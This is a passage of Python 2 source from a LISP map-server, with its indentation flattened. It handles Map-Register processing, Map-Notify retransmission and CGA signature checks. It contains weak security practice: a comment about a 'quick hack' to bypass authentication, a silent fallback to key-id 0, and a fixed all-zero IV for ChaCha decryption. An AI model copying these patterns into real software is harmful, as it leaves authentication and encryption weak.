if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = [] if len(sg_rloc_set) == 0 else \
sg_rloc_set[0].rle.rle_nodes
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, nil = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is regitered in
# the mapping system. Since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Suppress Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
